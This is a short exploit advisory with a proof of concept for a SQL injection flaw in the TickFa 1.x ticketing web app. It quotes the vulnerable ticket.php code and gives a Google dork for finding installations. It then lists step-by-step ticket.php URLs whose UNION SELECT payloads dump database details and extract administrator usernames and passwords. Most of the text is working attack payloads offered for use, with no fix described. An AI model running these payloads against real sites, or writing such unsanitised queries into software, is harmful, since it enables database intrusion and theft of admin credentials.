/*
#[+] Author: Mohammad Reza Espargham
#[+] Title: TickFa 1.x  - SQL Injection Vulnerability
#[+] Date: 26-04-2015
#[+] Vendor: http://tickfa.aftab.cc/
#[+] SoftWare Link : http://tickfa.aftab.cc/dl/tickfa.zip
#[+] Type: WebAPP
#[+] Tested on: KaliLinux (Debian) / curl 7.35.0
#[+] GHDB : intext:"تیکت برای بخش مورد نظر ایجاد نمایید"
dash>
*/



                          
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
ticket.php Source

$tid = $_REQUEST['tid'];
$userid = $_SESSION['userid'];
....
....
$reply = mysql_query("SELECT * FROM `".$dbprefix."answers` WHERE 
tid='$tid' order by date");
					while($reply_row=mysql_fetch_array($reply))
					{

                          
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

////////////////
///  POC   ////
///////////////
1. You Most register in website from this link 
http://site.com/register.php
2. You most login in website
3. send ticket
4. Your Vulnerabe Link
http://site.com/ticket.php?action=read&tid={Ticket ID}
http://site.com/ticket.php?action=read&tid=65'


http://site.com/ticket.php?action=read&tid=65 union select     
3,4,5,6,7,8,9,10,CONCAT_WS(CHAR(59),version(),current_user(),database()) 
from [profix]_admins
http://site.com/ticket.php?action=read&tid=65 union select 
1,2,3,4,5,6,7,8,9,10,group_concat(apass,0x23,auname) from 
[profix]_admins
5.END <3